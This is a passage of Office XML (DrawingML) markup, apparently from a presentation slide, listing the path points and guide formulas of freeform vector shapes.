                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="109"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="8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167" name="Freeform 94"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="425" y="2268"/>
                <a:ext cx="239" cy="148"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 734"/>
                  <a:gd name="T1" fmla="*/ 0 h 454"/>
                  <a:gd name="T2" fmla="*/ 0 w 734"/>
                  <a:gd name="T3" fmla="*/ 0 h 454"/>
                  <a:gd name="T4" fmla="*/ 0 w 734"/>
                  <a:gd name="T5" fmla="*/ 0 h 454"/>
                  <a:gd name="T6" fmla="*/ 0 w 734"/>
                  <a:gd name="T7" fmla="*/ 0 h 454"/>
                  <a:gd name="T8" fmla="*/ 0 w 734"/>
                  <a:gd name="T9" fmla="*/ 0 h 454"/>
                  <a:gd name="T10" fmla="*/ 0 w 734"/>
                  <a:gd name="T11" fmla="*/ 0 h 454"/>
                  <a:gd name="T12" fmla="*/ 0 w 734"/>
                  <a:gd name="T13" fmla="*/ 0 h 454"/>
                  <a:gd name="T14" fmla="*/ 0 w 734"/>
                  <a:gd name="T15" fmla="*/ 0 h 454"/>
                  <a:gd name="T16" fmla="*/ 0 w 734"/>
                  <a:gd name="T17" fmla="*/ 0 h 454"/>
                  <a:gd name="T18" fmla="*/ 0 w 734"/>
                  <a:gd name="T19" fmla="*/ 0 h 454"/>
                  <a:gd name="T20" fmla="*/ 0 w 734"/>
                  <a:gd name="T21" fmla="*/ 0 h 454"/>
                  <a:gd name="T22" fmla="*/ 0 w 734"/>
                  <a:gd name="T23" fmla="*/ 0 h 454"/>
                  <a:gd name="T24" fmla="*/ 0 w 734"/>
                  <a:gd name="T25" fmla="*/ 0 h 454"/>
                  <a:gd name="T26" fmla="*/ 0 w 734"/>
                  <a:gd name="T27" fmla="*/ 0 h 454"/>
                  <a:gd name="T28" fmla="*/ 0 w 734"/>
                  <a:gd name="T29" fmla="*/ 0 h 454"/>
                  <a:gd name="T30" fmla="*/ 0 w 734"/>
                  <a:gd name="T31" fmla="*/ 0 h 454"/>
                  <a:gd name="T32" fmla="*/ 0 w 734"/>
                  <a:gd name="T33" fmla="*/ 0 h 454"/>
                  <a:gd name="T34" fmla="*/ 0 w 734"/>
                  <a:gd name="T35" fmla="*/ 0 h 454"/>
                  <a:gd name="T36" fmla="*/ 0 w 734"/>
                  <a:gd name="T37" fmla="*/ 0 h 454"/>
                  <a:gd name="T38" fmla="*/ 0 w 734"/>
                  <a:gd name="T39" fmla="*/ 0 h 454"/>
                  <a:gd name="T40" fmla="*/ 0 w 734"/>
                  <a:gd name="T41" fmla="*/ 0 h 454"/>
                  <a:gd name="T42" fmla="*/ 0 w 734"/>
                  <a:gd name="T43" fmla="*/ 0 h 454"/>
                  <a:gd name="T44" fmla="*/ 0 w 734"/>
                  <a:gd name="T45" fmla="*/ 0 h 454"/>
                  <a:gd name="T46" fmla="*/ 0 w 734"/>
                  <a:gd name="T47" fmla="*/ 0 h 454"/>
                  <a:gd name="T48" fmla="*/ 0 w 734"/>
                  <a:gd name="T49" fmla="*/ 0 h 454"/>
                  <a:gd name="T50" fmla="*/ 0 w 734"/>
                  <a:gd name="T51" fmla="*/ 0 h 454"/>
                  <a:gd name="T52" fmla="*/ 0 w 734"/>
                  <a:gd name="T53" fmla="*/ 0 h 454"/>
                  <a:gd name="T54" fmla="*/ 0 w 734"/>
                  <a:gd name="T55" fmla="*/ 0 h 454"/>
                  <a:gd name="T56" fmla="*/ 0 w 734"/>
                  <a:gd name="T57" fmla="*/ 0 h 454"/>
                  <a:gd name="T58" fmla="*/ 0 w 734"/>
                  <a:gd name="T59" fmla="*/ 0 h 454"/>
                  <a:gd name="T60" fmla="*/ 0 w 734"/>
                  <a:gd name="T61" fmla="*/ 0 h 454"/>
                  <a:gd name="T62" fmla="*/ 0 w 734"/>
                  <a:gd name="T63" fmla="*/ 0 h 454"/>
                  <a:gd name="T64" fmla="*/ 0 w 734"/>
                  <a:gd name="T65" fmla="*/ 0 h 454"/>
                  <a:gd name="T66" fmla="*/ 0 w 734"/>
                  <a:gd name="T67" fmla="*/ 0 h 454"/>
                  <a:gd name="T68" fmla="*/ 0 w 734"/>
                  <a:gd name="T69" fmla="*/ 0 h 454"/>
                  <a:gd name="T70" fmla="*/ 0 w 734"/>
                  <a:gd name="T71" fmla="*/ 0 h 454"/>
                  <a:gd name="T72" fmla="*/ 0 w 734"/>
                  <a:gd name="T73" fmla="*/ 0 h 454"/>
                  <a:gd name="T74" fmla="*/ 0 w 734"/>
                  <a:gd name="T75" fmla="*/ 0 h 454"/>
                  <a:gd name="T76" fmla="*/ 0 w 734"/>
                  <a:gd name="T77" fmla="*/ 0 h 454"/>
                  <a:gd name="T78" fmla="*/ 0 w 734"/>
                  <a:gd name="T79" fmla="*/ 0 h 454"/>
                  <a:gd name="T80" fmla="*/ 0 w 734"/>
                  <a:gd name="T81" fmla="*/ 0 h 454"/>
                  <a:gd name="T82" fmla="*/ 0 w 734"/>
                  <a:gd name="T83" fmla="*/ 0 h 454"/>
                  <a:gd name="T84" fmla="*/ 0 w 734"/>
                  <a:gd name="T85" fmla="*/ 0 h 454"/>
                  <a:gd name="T86" fmla="*/ 0 w 734"/>
                  <a:gd name="T87" fmla="*/ 0 h 454"/>
                  <a:gd name="T88" fmla="*/ 0 w 734"/>
                  <a:gd name="T89" fmla="*/ 0 h 454"/>
                  <a:gd name="T90" fmla="*/ 0 w 734"/>
                  <a:gd name="T91" fmla="*/ 0 h 454"/>
                  <a:gd name="T92" fmla="*/ 0 w 734"/>
                  <a:gd name="T93" fmla="*/ 0 h 454"/>
                  <a:gd name="T94" fmla="*/ 0 w 734"/>
                  <a:gd name="T95" fmla="*/ 0 h 454"/>
                  <a:gd name="T96" fmla="*/ 0 w 734"/>
                  <a:gd name="T97" fmla="*/ 0 h 454"/>
                  <a:gd name="T98" fmla="*/ 0 w 734"/>
                  <a:gd name="T99" fmla="*/ 0 h 454"/>
                  <a:gd name="T100" fmla="*/ 0 w 734"/>
                  <a:gd name="T101" fmla="*/ 0 h 454"/>
                  <a:gd name="T102" fmla="*/ 0 w 734"/>
                  <a:gd name="T103" fmla="*/ 0 h 454"/>
                  <a:gd name="T104" fmla="*/ 0 w 734"/>
                  <a:gd name="T105" fmla="*/ 0 h 454"/>
                  <a:gd name="T106" fmla="*/ 0 w 734"/>
                  <a:gd name="T107" fmla="*/ 0 h 454"/>
                  <a:gd name="T108" fmla="*/ 0 w 734"/>
                  <a:gd name="T109" fmla="*/ 0 h 454"/>
                  <a:gd name="T110" fmla="*/ 0 w 734"/>
                  <a:gd name="T111" fmla="*/ 0 h 454"/>
                  <a:gd name="T112" fmla="*/ 0 w 734"/>
                  <a:gd name="T113" fmla="*/ 0 h 454"/>
                  <a:gd name="T114" fmla="*/ 0 w 734"/>
                  <a:gd name="T115" fmla="*/ 0 h 454"/>
                  <a:gd name="T116" fmla="*/ 0 w 734"/>
                  <a:gd name="T117" fmla="*/ 0 h 4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34"/>
                  <a:gd name="T178" fmla="*/ 0 h 454"/>
                  <a:gd name="T179" fmla="*/ 734 w 734"/>
                  <a:gd name="T180" fmla="*/ 454 h 45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34" h="454">
                    <a:moveTo>
                      <a:pt x="0" y="395"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="8" y="399"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="406"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="415"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="425"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="435"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="444"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="138" y="450"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="146" y="453"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="151" y="454"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="160" y="454"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="171" y="454"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="182" y="453"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="193" y="453"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="203" y="452"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="211" y="452"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="214" y="450"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="220" y="449"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="233" y="447"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="249" y="444"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="269" y="440"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="287" y="437"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="304" y="434"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="318" y="432"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="326" y="431"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="332" y="431"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="339" y="432"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="348" y="432"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="357" y="433"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="366" y="433"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="377" y="433"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="385" y="433"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="392" y="433"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="399" y="432"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="407" y="430"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="416" y="427"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="425" y="424"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="433" y="421"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="441" y="417"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="449" y="414"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="455" y="411"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="461" y="410"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="467" y="408"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="473" y="407"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="479" y="406"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="486" y="404"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="492" y="403"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="497" y="402"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="500" y="402"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="507" y="398"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="515" y="387"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="521" y="378"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="523" y="372"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="522" y="372"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="517" y="371"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="511" y="370"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="506" y="369"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="499" y="368"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="493" y="366"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="490" y="365"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="488" y="364"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="492" y="362"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="502" y="360"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="515" y="356"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="531" y="353"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="547" y="350"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="560" y="347"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="570" y="345"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="574" y="342"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="573" y="340"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="568" y="337"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="561" y="333"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="554" y="329"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="546" y="325"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="539" y="323"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="535" y="320"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="532" y="319"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="531" y="318"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="531" y="316"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="531" y="314"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="532" y="311"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="538" y="310"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="551" y="310"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="569" y="309"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="590" y="308"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="611" y="307"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="629" y="307"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="644" y="306"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="651" y="306"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="653" y="303"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="651" y="299"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="646" y="293"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="642" y="288"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="643" y="286"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="647" y="284"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="655" y="281"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="667" y="280"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="678" y="278"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="691" y="276"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="704" y="274"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="714" y="272"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="728" y="266"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="734" y="258"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="734" y="250"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="730" y="245"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="727" y="245"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="720" y="246"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="711" y="247"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="700" y="248"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="690" y="249"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="681" y="250"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="675" y="251"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="672" y="251"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="669" y="250"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="666" y="248"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="664" y="246"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="662" y="245"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="664" y="242"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="668" y="239"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="675" y="234"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="682" y="230"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="690" y="224"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="697" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="702" y="215"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="705" y="212"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="704" y="208"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="699" y="203"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="692" y="200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="688" y="197"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="684" y="197"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="677" y="197"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="668" y="197"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="657" y="199"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="645" y="200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="634" y="200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="624" y="201"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="617" y="201"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="612" y="200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="611" y="195"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="612" y="192"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="614" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="617" y="187"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="626" y="185"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="636" y="180"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="649" y="176"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="661" y="170"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="673" y="165"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="681" y="162"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="687" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="690" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="689" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="687" y="141"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="684" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="680" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="670" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="658" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="643" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="627" y="139"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="613" y="140"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="602" y="140"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="596" y="141"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="590" y="141"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="584" y="140"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="579" y="138"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="578" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="582" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="590" y="128"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="600" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="614" y="113"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="627" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="637" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="645" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="649" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="645" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="637" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="626" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="613" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="599" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="589" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="581" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="579" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="583" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="589" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="596" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="602" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="609" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="615" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="620" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="621" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="619" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="611" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="600" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="589" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="575" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="562" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="552" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="545" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="544" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="544" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="544" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="545" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="548" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="554" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="562" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="570" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="579" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="586" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="591" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="592" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="590" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="585" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="578" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="571" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="563" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="556" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="549" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="546" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="539" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="524" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="505" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="483" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="459" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="437" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="418" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="406" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="401" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="393" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="384" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="373" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="362" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="353" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="345" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="340" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="349" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="356" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="363" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="370" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="376" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="380" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="388" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="399" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="410" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="422" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="431" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="438" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="441" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="445" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="448" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="450" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="452" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="446" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="434" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="419" y="70"/>
